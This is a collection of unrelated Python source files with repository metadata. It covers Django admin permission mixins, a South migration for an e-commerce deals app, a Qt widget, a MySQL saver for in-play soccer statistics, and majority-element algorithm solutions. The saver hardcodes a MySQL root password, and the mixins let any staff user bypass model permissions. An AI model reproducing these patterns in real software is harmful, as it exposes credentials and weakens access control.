1fef7a4826a9cfda2ae498faf73994059b0b0e6c | 097dda217c3d31b69cb309369dc0357fe0f229ab | /app/customadmin/mixins.py | 2a50cfaa427fe7b145bd481d88229b25ee87aa49 | [] | no_license | Jaycitrusbug/book-python | 57a96ee343eee5b63ca5f7ee2461db82426321b5 | b5a4de74c9114546ee03b8aa5de1381719ddf74e | refs/heads/master | 2023-06-20T01:52:29.484415 | 2021-07-16T13:06:05 | 2021-07-16T13:06:05 | 386,638,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,461 | py | # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import get_permission_codename
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import redirect
# -----------------------------------------------------------------------------
class SuccessMessageMixin(object):
"""CBV mixin which adds a success message on form save."""
success_message = ""
def get_success_message(self):
return self.success_message
def form_valid(self, form):
response = super().form_valid(form)
success_message = self.get_success_message()
if not self.request.is_ajax() and success_message:
messages.success(self.request, success_message)
return response
# def forms_valid(self, forms):
# """Ensure it works with multi_form_view.MultiModelFormView."""
# print("SuccessMessageMixin:forms_valid")
# response = super().forms_valid(forms)
# success_message = self.get_success_message()
# if not self.request.is_ajax() and success_message:
# messages.success(self.request, success_message)
# return response
class ModelOptsMixin(object):
"""CBV mixin which adds model options to the context."""
def get_context_data(self, **kwargs):
"""Returns the context data to use in this view."""
ctx = super().get_context_data(**kwargs)
if hasattr(self, "model"):
ctx["opts"] = self.model._meta
return ctx
class HasPermissionsMixin(object):
"""CBV mixin which adds has_permission options to the context."""
def has_add_permission(self, request):
print('-------------------has_add_permission----------------')
print('-------------------has_add_permission----------------')
print('-------------------has_add_permission----------------')
"""
Return True if the given request has permission to add an object.
Can be overridden by the user in subclasses.
"""
opts = self.model._meta
codename = get_permission_codename("add", opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename)) or request.user.is_staff
def has_change_permission(self, request, obj=None):
"""
Return True if the given request has permission to change the given
Django model instance, the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to change the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to change *any* object of the given type.
"""
opts = self.model._meta
codename = get_permission_codename("change", opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename)) or request.user.is_staff
def has_delete_permission(self, request, obj=None):
"""
Return True if the given request has permission to change the given
Django model instance, the default implementation doesn't examine the
`obj` parameter.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to delete the `obj`
model instance. If `obj` is None, this should return True if the given
request has permission to delete *any* object of the given type.
"""
opts = self.model._meta
codename = get_permission_codename("delete", opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename)) or request.user.is_staff
def has_view_permission(self, request, obj=None):
"""
Return True if the given request has permission to view the given
Django model instance. The default implementation doesn't examine the
`obj` parameter.
If overridden by the user in subclasses, it should return True if the
given request has permission to view the `obj` model instance. If `obj`
is None, it should return True if the request has permission to view
any object of the given type.
"""
opts = self.model._meta
codename_view = get_permission_codename("view", opts)
codename_change = get_permission_codename("change", opts)
print('----------------------------------', "%s.%s" % (opts.app_label, codename_view), '----------------------------------' )
return request.user.has_perm(
"%s.%s" % (opts.app_label, codename_view)
) or request.user.has_perm("%s.%s" % (opts.app_label, codename_change)) or request.user.is_staff
def has_view_or_change_permission(self, request, obj=None):
return self.has_view_permission(request, obj) or self.has_change_permission(
request, obj
) or request.user.is_staff
def has_module_permission(self, request):
"""
Return True if the given request has any permission in the given
app label.
Can be overridden by the user in subclasses. In such case it should
return True if the given request has permission to view the module on
the admin index page and access the module's index page. Overriding it
does not restrict access to the add, change or delete views. Use
`ModelAdmin.has_(add|change|delete)_permission` for that.
"""
opts = self.model._meta
return request.user.has_module_perms(opts.app_label) or request.user.is_staff
def get_context_data(self, **kwargs):
"""Returns the context data to use in this view."""
ctx = super().get_context_data(**kwargs)
if hasattr(self, "model"):
ctx["has_add_permission"] = self.has_add_permission(self.request)
ctx["has_change_permission"] = self.has_change_permission(self.request)
ctx["has_delete_permission"] = self.has_delete_permission(self.request)
ctx["has_view_permission"] = self.has_view_permission(self.request)
ctx["has_view_or_change_permission"] = self.has_view_or_change_permission(
self.request
)
ctx["has_module_permission"] = self.has_module_permission(self.request)
if hasattr(self, "object"):
ctx["add"] = self.object is None
return ctx
| [
"jay.citrusbug@gmail.com"
] | jay.citrusbug@gmail.com |
ab44c61a08bafb6bc721cd98b410a587695b4f8f | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_Anscombe/model_control_one_enabled_Anscombe_MovingAverage_Seasonal_Second_ARX.py | c958c960f5731fcc823ea172e5b07cbf2c2a8f40 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 166 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Anscombe'] , ['MovingAverage'] , ['Seasonal_Second'] , ['ARX'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
7b1b7a1f6efa7c705b819d292641046e170df0b9 | 548c26cc8e68c3116cecaf7e5cd9aadca7608318 | /dealprops/migrations/0008_auto__add_field_dailydeal_steal_now_image__del_field_dailydealimage_da.py | d69f30823cdf4a1e8fd38ec395041851b0de51a3 | [] | no_license | Morphnus-IT-Solutions/riba | b69ecebf110b91b699947b904873e9870385e481 | 90ff42dfe9c693265998d3182b0d672667de5123 | refs/heads/master | 2021-01-13T02:18:42.248642 | 2012-09-06T18:20:26 | 2012-09-06T18:20:26 | 4,067,896 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,890 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'DailyDeal.steal_now_image'
db.add_column('dealprops_dailydeal', 'steal_now_image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True), keep_default=False)
# Deleting field 'DailyDealImage.day_image'
db.delete_column('dealprops_dailydealimage', 'day_image')
# Deleting field 'DailyDealImage.steal_now_image'
db.delete_column('dealprops_dailydealimage', 'steal_now_image')
def backwards(self, orm):
# Deleting field 'DailyDeal.steal_now_image'
db.delete_column('dealprops_dailydeal', 'steal_now_image')
# Adding field 'DailyDealImage.day_image'
db.add_column('dealprops_dailydealimage', 'day_image', self.gf('django.db.models.fields.files.ImageField')(default='', max_length=100), keep_default=False)
# Adding field 'DailyDealImage.steal_now_image'
db.add_column('dealprops_dailydealimage', 'steal_now_image', self.gf('django.db.models.fields.files.ImageField')(default='', max_length=100), keep_default=False)
models = {
'accounts.account': {
'Meta': {'object_name': 'Account'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Client']"}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'confirmed_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> order@chaupaati.com'", 'max_length': '500'}),
'confirmed_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'customer_support_no': ('django.db.models.fields.CharField', [], {'max_length': '150', 'blank': 'True'}),
'dni': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
'greeting_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'greeting_title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pending_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> lead@chaupaati.com'", 'max_length': '500'}),
'pending_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'pg_return_url': ('django.db.models.fields.URLField', [], {'default': "'http://www.chaupaati.in'", 'max_length': '200', 'blank': 'True'}),
'primary_email': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'primary_phone': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'returns_policy': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'secondary_email': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'secondary_phone': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'share_product_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> share@chaupaati.com'", 'max_length': '500'}),
'shipping_policy': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {}),
'sms_mask': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'tos': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Channel'", 'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'accounts.client': {
'Meta': {'object_name': 'Client'},
'confirmed_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> order@chaupaati.com'", 'max_length': '500'}),
'confirmed_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'noreply_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> noreply@chaupaati.com'", 'max_length': '200'}),
'pending_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> lead@chaupaati.com'", 'max_length': '500'}),
'pending_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'share_product_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> share@chaupaati.com'", 'max_length': '500'}),
'signature': ('django.db.models.fields.TextField', [], {}),
'sms_mask': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'catalog.availability': {
'Meta': {'object_name': 'Availability'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'catalog.brand': {
'Meta': {'object_name': 'Brand'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'catalog.product': {
'Meta': {'object_name': 'Product'},
'brand': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Brand']"}),
'cart_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']"}),
'confirmed_order_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'inr'", 'max_length': '3'}),
'description': ('tinymce.models.HTMLField', [], {}),
'ext_large_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'ext_medium_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'ext_small_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'has_images': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True', 'blank': 'True'}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'pending_order_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'product_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.ProductType']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150', 'db_index': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'active'", 'max_length': '15', 'db_index': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'normal'", 'max_length': '10'}),
'video_embed': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'view_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.sellerratechart': {
'Meta': {'object_name': 'SellerRateChart'},
'article_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'blank': 'True'}),
'availability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Availability']"}),
'cod_available_at': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'cod_available_at'", 'null': 'True', 'to': "orm['catalog.Availability']"}),
'cod_charge': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '2', 'blank': 'True'}),
'condition': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '5', 'db_index': 'True'}),
'detailed_desc': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'external_product_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'external_product_link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'gift_desc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'gift_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_cod_available': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_prefered': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'key_feature': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'offer_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'payment_charges_paid_by': ('django.db.models.fields.CharField', [], {'default': "'chaupaati'", 'max_length': '15'}),
'payment_collection_charges': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'seller': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products_offered'", 'to': "orm['accounts.Account']"}),
'shipping_charges': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'shipping_duration': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'shipping_paid_by': ('django.db.models.fields.CharField', [], {'default': "'vendor'", 'max_length': '15'}),
'short_desc': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'sku': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'stock_status': ('django.db.models.fields.CharField', [], {'default': "'instock'", 'max_length': '100'}),
'transfer_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2'}),
'visibility_status': ('django.db.models.fields.CharField', [], {'default': "'always_visible'", 'max_length': '100', 'db_index': 'True'}),
'warranty': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'whats_in_the_box': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Client']"}),
'ext_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Account']", 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '100', 'db_index': 'True'}),
'store': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Store']", 'null': 'True', 'blank': 'True'})
},
'categories.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'categories.store': {
'Meta': {'object_name': 'Store'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'dealprops.dailydeal': {
'Meta': {'object_name': 'DailyDeal'},
'ends_on': ('django.db.models.fields.DateTimeField', [], {}),
'features': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'market_price_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'n_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'note_bg_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'product_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'rate_chart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.SellerRateChart']"}),
'starts_on': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'steal_now_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tag_line': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'tag_line_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'todays_steal_color_code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'dealprops.dailydealimage': {
'Meta': {'object_name': 'DailyDealImage'},
'daily_deal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['dealprops.DailyDeal']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
}
}
complete_apps = ['dealprops']
| [
"saumil.dalal@futuregroup.in"
] | saumil.dalal@futuregroup.in |
aceb6eae41948f7ba22172a460aa667e1dff7b03 | 4656c9b22bee48b4156eb3524bab3215a1993d83 | /packages/gui/assets_widget/assets_item.py | 1d0fb14b51071fdc41de479eeca1fa77a8ee7819 | [] | no_license | mikebourbeauart/tempaam | 0bc9215de0d967788b3c65b481a5fd3c7153dddc | c2582b5cc1fc45042c5b435f703786d7c04a51a2 | refs/heads/master | 2021-03-27T10:35:43.378899 | 2018-09-06T04:46:18 | 2018-09-06T04:46:18 | 120,359,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from Qt import QtWidgets
class AssetsItem(QtWidgets.QTreeWidgetItem):
def __init__(self, *args):
QtWidgets.QTreeWidgetItem.__init__(self, *args) | [
"borbs727@gmail.com"
] | borbs727@gmail.com |
7bee31495c45a466373e68c775248f9c546b3a6c | d1b3c9e1055bc759f5fba8379570ddc20cf4caa5 | /Saver.py | 778690ec07d95b39c92c0776b8afd32ca1b8562c | [] | no_license | woolpeeker/bet365_data | 309b38245c77d9f9387c7d946dbb8410c4c84bc6 | 4cb920095f98faf220c74125d39ccdfe84229ee3 | refs/heads/master | 2020-03-29T22:48:40.234365 | 2018-12-14T03:41:42 | 2018-12-14T03:41:42 | 150,441,477 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,069 | py | import datetime
import traceback
import pymysql
from utils import get_logger
sql_cmd = {
'create_table': "CREATE TABLE inplay ( \
id int NOT NULL AUTO_INCREMENT, PRIMARY KEY (id),\
insert_time datetime NOT NULL, \
crawler varchar(255), \
fp char(255) NOT NULL, \
league char(255), date Date NOT NULL, \
team_h char(255) NOT NULL, team_a char(255) NOT NULL, minute smallint NOT NULL, \
corner_h smallint, corner_a smallint, \
yellow_h smallint, yellow_a smallint, \
red_h smallint, red_a smallint, \
throw_h smallint, throw_a smallint, \
freekick_h smallint, freekick_a smallint, \
goalkick_h smallint, goalkick_a smallint, \
penalty_h smallint, penalty_a smallint, \
goal_h smallint, goal_a smallint, \
attacks_h smallint, attacks_a smallint, \
dangerous_attacks_h smallint, dangerous_attacks_a smallint, \
possession_h smallint, possession_a smallint, \
on_target_h smallint, on_target_a smallint, \
off_target_h smallint, off_target_a smallint, \
odds_fulltime varchar(255), odds_double varchar(255), \
odds_corners varchar(255), odds_asian_corners varchar(255),\
odds_match_goals varchar(255), odds_alter_goals varchar(255), \
odds_goals_odd_even varchar(255), odds_most_corners varchar(255));"
}
class Saver:
def __init__(self, name='saver'):
self.name=name
self.logger=get_logger(self.name)
self.conn = pymysql.connect(host="localhost", user="root", password="123456", database="soccer", charset='utf8', autocommit=True)
if not self.exist_table():
self.create_table()
def exist_table(self):
sql = "SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'soccer' and table_name = 'inplay';"
with self.conn.cursor() as cur:
cur.execute(sql)
result = cur.fetchone()
if result is None:
self.logger.info("table doesn't exists")
return False
else:
self.logger.info('table exists')
return True
def create_table(self):
self.logger.info('create_table')
sql = sql_cmd['create_table']
with self.conn.cursor() as cur:
try:
cur.execute(sql)
except:
self.logger.error(traceback.format_exc())
self.conn.rollback()
if not self.exist_table():
self.logger.error('create table Fails.')
raise Exception('create table Fails.')
else:
self.logger.info('create table successful')
def sql_query(self, sql, sql_args):
self.logger.debug('sql_query: %s args: %s' % (sql, sql_args))
with self.conn.cursor() as cur:
cur.execute(sql, sql_args)
result = cur.fetchall()
return result
def process_vals(self,vals):
converted=[]
for v in vals:
if v is None:
converted.append(None)
elif isinstance(v, datetime.date):
converted.append(str(v))
elif isinstance(v,(int, float, str)):
converted.append(v)
else:
converted.append(str(v))
self.logger.error("Unexpected datatype, just str it: %s" % type(v))
return converted
def sql_insert(self, sample):
self.logger.debug('sql_insert: %s' % sample)
assert type(sample) == dict
try:
sample['insert_time'] = datetime.datetime.now()
keys = ','.join(sample.keys())
vals = self.process_vals(sample.values())
holder=lambda num: ','.join(['%s']*num)
sql = 'INSERT INTO inplay ({keys}) VALUES ({vals});'.format(keys=keys,vals=holder(len(vals)))
sql_args=vals
self.logger.debug('sql: %s args: %s'%(sql,sql_args))
with self.conn.cursor() as cur:
cur.execute(sql, sql_args)
except Exception as e:
self.logger.error('sql_insert error: %s' % sample)
self.logger.error(traceback.format_exc())
self.logger.debug('sql_insert success: %s' % sample)
def insert(self, input):
self.logger.debug('insert: %s'%input)
today = datetime.date.today()
same_team_set = self.sql_query("SELECT id, date, minute FROM inplay WHERE team_h=%s and team_a=%s ORDER BY id;",(input['team_h'], input['team_a']))
if not same_team_set:
self.logger.debug('same_team_set is empty')
date = today
else:
id, last_date, last_minute = same_team_set[-1]
delta = today - last_date
if delta.total_seconds() < 24 * 3600:
date = last_date
else:
date = today
if input['minute'] == 90 and input['minute'] < last_minute:
input['minute'] = -1
if date == last_date and input['minute'] == last_minute:
return
input['date'] = date
input['fp'] = '##'.join([str(input[k]) for k in ['league', 'date', 'team_h', 'team_a']])
self.sql_insert(input)
| [
"luojiapeng1993@gmail.com"
] | luojiapeng1993@gmail.com |
cc82fb1b7b8286a21e86fe57bd1cbeba056b0bbe | 3cf0d750948a758d5771dd778fbb783d64a044ae | /src/algo_cases/第9章/9_4.py | 1b8b02fc6a55727dfa928a539382f6f384f9e3db | [
"CC-BY-NC-SA-4.0",
"Apache-2.0"
] | permissive | hbulpf/pydemo | 6552a08b3c85721ac1b2ba335b030e234ad03b6c | ea3e9f9086116a86ecef803e9e3179a34c94c20f | refs/heads/master | 2022-11-30T21:06:29.933820 | 2022-01-15T17:05:16 | 2022-01-15T17:05:16 | 237,584,300 | 6 | 1 | Apache-2.0 | 2022-11-22T09:49:38 | 2020-02-01T08:20:43 | Python | UTF-8 | Python | false | false | 1,001 | py | class Solution:
def findnum(self, nums):
def func(low,high):
if low==high:
return nums[low]
mid=low+(high-low)//2
head=func(low,mid)
tail=func(mid+1,high)
if head==tail:
return tail
head_count=sum(1 for i in range(low,high+1) if nums[i]==head)
tail_count=sum(1 for i in range(low,high+1) if nums[i]==tail)
return head if head_count>tail_count else tail
return func(0,len(nums)-1)
class Solution:
def findnum(self, nums):
dic={}
for i in nums:
dic[i]=dic.get(i,0)+1
return max(dic.keys(),key=dic.get)
class Solution:
def findnum(self, nums):
times=1
re=nums[0]
for i in range(1,len(nums)):
if times==0:
re=nums[i]
times+=1
elif nums[i]==re:
times+=1
else:
times-=1
return re
| [
"hudalpf@163.com"
] | hudalpf@163.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.